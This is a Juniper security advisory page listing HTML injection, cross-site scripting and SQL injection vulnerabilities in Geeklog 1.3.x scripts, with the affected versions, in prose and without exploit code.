J-Security Center

Latest Attack Object Updates
  • IDP Daily Update #1454
    posted: 06/29/09
  • NSM Daily Update #1454
    posted: 06/29/09
  • Deep Inspection 5.3r5 and above, 5.4, 6.0 #1454
    posted: 06/29/09
  • Deep Inspection 5.1 and 5.2 #1435
    posted: 06/29/09
  • Deep Inspection 5.0, 5.3r4 and below #1132
    posted: 03/28/08 (04/01/08 for 5.0)
  • Antivirus
    posted: 06/28/09

Title: Multiple Geeklog Vulnerabilities

Severity: MODERATE

Description:

Multiple vulnerabilities have been reported in Geeklog. The following issues were reported:

An HTML injection vulnerability that may allow unauthenticated remote attackers to send hostile HTML and script code to Geeklog users via Shoutbox.

Multiple cross-site script issues in the index.php, brokenfile.php and read-story.php scripts that may permit remote attackers to construct malicious links to a Geeklog site that include hostile HTML.

The HTML injection and cross-site scripting issues could potentially be exploited to steal cookie-based authentication credentials from legitimate users. Other attacks are also possible.

Several SQL injection issues have been reported in the index.php, viewtopic.php, visit.php, viewcat.php, comment.php, read-story.php and singlefile.php scripts. These issues could permit remote attackers to inject malicious SQL syntax into database queries, potentially allowing unauthorized access to sensitive information or other consequences.

Weaknesses in the Geeklog implementation have also been reported, such as incorrect proxy logging and inadequate facilities for denying access by IP.

Some of these issues may be related to previously documented vulnerabilities in Geeklog. These issues are currently pending further analysis. New BIDs will be created and existing BIDs updated where it is appropriate when analysis is complete.

Affected Products:

  • Geeklog Geeklog 1.3.0
  • Geeklog Geeklog 1.3.5
  • Geeklog Geeklog 1.3.5 sr1
  • Geeklog Geeklog 1.3.5 sr2
  • Geeklog Geeklog 1.3.7
  • Geeklog Geeklog 1.3.7 sr1
  • Geeklog Geeklog 1.3.7 sr2
  • Geeklog Geeklog 1.3.8
  • Geeklog Geeklog 1.3.8 -1
  • Geeklog Geeklog 1.3.8 rc1
  • Geeklog Geeklog 1.3.8 rc2

References:

Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.